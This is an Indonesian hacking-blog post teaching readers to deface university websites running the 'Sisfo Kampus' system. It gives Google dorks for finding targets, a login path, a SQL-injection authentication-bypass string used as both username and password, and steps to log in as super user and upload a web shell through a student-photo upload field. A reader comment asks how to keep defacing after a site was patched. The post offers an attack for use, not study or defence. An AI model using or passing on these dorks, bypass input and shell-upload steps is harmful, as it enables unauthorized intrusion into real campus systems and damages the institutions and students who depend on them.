www.squadcyber.org - Yaho guys, kali ini wa mau kasih tutorial depes website Kampus/Universitas pakek metode Bypass Admin :v Meskipun Tutorial lama, Tapi mungkin aja ada yang lom tau jdi apa salahnya share tutorial sederhana ini :v Yok langsung sadja :v
Bahan" :
Dork :
inurl:"?mnux=" intext:siakad
inurl:"?mnux=" intext:akademik
inurl:"?mnux=" intext:sisfo
inurl:"?mnux=" site:id
inurl:"?mnux=" site:com
inurl:"?mnux=" site:net
inurl:/?mnux=login
intext:"Powered by Sisfo Kampus"
(kembangin lagi guys :v)
Exploit : www.site.co.li/?mnux=login
User & Pass nya : '=''or'
Langsung yok :v
1. Dorking pakek dork diatas :v
2. Masukin Exploit nya lalu pilih "Super user"
3. Masukin User & Pass nya : '=''or' lalu klik login
4. Pilih menu Master lalu pilih Mahasiswa
5. Klik edit atau yang ane kasih kotak an merah
6. Pilih Ganti Foto untuk upload shell/script kalian
7. Browse file kalian lalu klik Upload File Foto. Akses? Klik kanan Kotak an putih itu lalu pilih "Copy Image Location".
8. Paste di new tabs lalu liat hasilnya :v
Cukup Mudah kan? :v Untuk upload shell kalian bisa Pakek tamper data atau apalah itu :v
Sekian aja dari ane :v
Maap kalo salah/Kurang jelas >.<
Thanks :*









Min sya deface kampus cara sma gmbar yg mimin screnshot udah ga bisa gmna solusinya biar bekerja lagi apalah ada keamana baru di website tersebut
ReplyDelete